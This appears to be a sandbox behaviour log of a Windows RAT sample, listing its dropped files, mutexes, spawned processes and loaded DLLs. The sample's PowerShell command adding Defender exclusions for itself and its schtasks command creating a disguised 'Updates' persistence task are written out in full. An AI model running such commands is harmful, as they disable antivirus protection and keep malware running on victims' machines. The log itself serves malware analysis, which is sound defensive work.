Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, DcHUM92j2w5Tv1Pf7E.cs | Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, tc6CFuwhhqKghWoavi.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, DcHUM92j2w5Tv1Pf7E.cs | Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, DcHUM92j2w5Tv1Pf7E.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, DcHUM92j2w5Tv1Pf7E.cs | Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, tc6CFuwhhqKghWoavi.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, tc6CFuwhhqKghWoavi.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@26/20@4/4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | File created: C:\Users\user\AppData\Roaming\zDAKFK.exe
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2056:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7176
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Mutant created: \Sessions\1\BaseNamedObjects\oggolgXBJXeVlTZmpbUvnbnkWKC
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5144:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | File created: C:\Users\user\AppData\Local\Temp\tmpBE43.tmp
Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | ReversingLabs: Detection: 21%
Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Virustotal: Detection: 22%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zDAKFK.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE43.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\zDAKFK.exe C:\Users\user\AppData\Roaming\zDAKFK.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpCFF6.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Process created: C:\Users\user\AppData\Roaming\zDAKFK.exe "C:\Users\user\AppData\Roaming\zDAKFK.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7176 -s 1520
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zDAKFK.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE43.tmp"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpCFF6.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess created: C:\Users\user\AppData\Roaming\zDAKFK.exe "C:\Users\user\AppData\Roaming\zDAKFK.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: iconcodecservice.dllJump to behavior
